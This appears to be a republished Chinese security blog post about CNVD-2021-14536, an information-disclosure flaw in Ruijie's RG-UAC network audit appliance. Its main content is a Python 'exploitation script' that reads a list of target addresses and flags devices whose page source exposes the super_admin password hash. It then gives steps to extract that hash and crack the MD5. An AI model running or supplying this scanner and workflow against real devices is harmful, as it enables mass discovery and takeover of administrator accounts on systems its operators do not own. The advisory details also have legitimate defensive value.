前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >锐捷RG-UAC统一上网行为管理审计系统漏洞

锐捷RG-UAC统一上网行为管理审计系统漏洞

作者头像
用户5878089
发布2021-04-30 16:02:03
1.2K0
发布2021-04-30 16:02:03
举报

漏洞描述

锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证信息泄露。

漏洞编号

  • CNVD-2021-14536

利用类型

远程

漏洞分类

  • php

适用版本

锐捷RG-UAC统一上网行为管理审计系统

标签

  • php
  • IOT

发布日期

2021.03.08

漏洞等级

高危

漏洞原理

源码内密码的hash

漏洞利用

利用脚本

代码语言:javascript
复制
    import requests
    import sys
    import random
    import re
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    def title():
        print('+------------------------------------------')
        print('+  33[34mPOC_Des: http://wiki.peiqi.tech                                   33[0m')
        print('+  33[34mGithub : https://github.com/PeiQi0                                 33[0m')
        print('+  33[34m公众号 : PeiQi文库                                                     33[0m')
        print('+  33[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             33[0m')
        print('+  33[36m使用格式:  python3 poc.py                                            33[0m')
        print('+  33[36mFile         >>> ip.txt                             33[0m')
        print('+------------------------------------------')

    def POC_1(target_url):
        vuln_url = target_url
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        }
        try:
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
            if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
                print("33[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 33[0m".format(target_url))
            else:
                print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url))
        except Exception as e:
            print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url))

    def Scan(file_name):
        with open(file_name, "r", encoding='utf8') as scan_url:
            for url in scan_url:
                if url[:4] != "http":
                    url = "http://" + url
                url = url.strip('n')
                try:
                    POC_1(url)

                except Exception as e:
                    print("33[31m[x] 请求报错 33[0m".format(e))
                    continue

    if __name__ == '__main__':
        title()
        file_name  = str(input("33[35mPlease input Attack FilenFile >>> 33[0m"))
        Scan(file_name)

利用方法

  • 查看源码
  • 找到密码的hash
  • md5解密

利用过程

参考链接

  • https://blog.csdn.net/Adminxe/article/details/114584215
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-04-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 无级安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞描述
  • 漏洞编号
  • 利用类型
  • 漏洞分类
  • 适用版本
  • 标签
  • 发布日期
  • 漏洞等级
  • 漏洞原理
  • 漏洞利用
    • 利用脚本
      • 利用方法
        • 利用过程
        • 参考链接
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档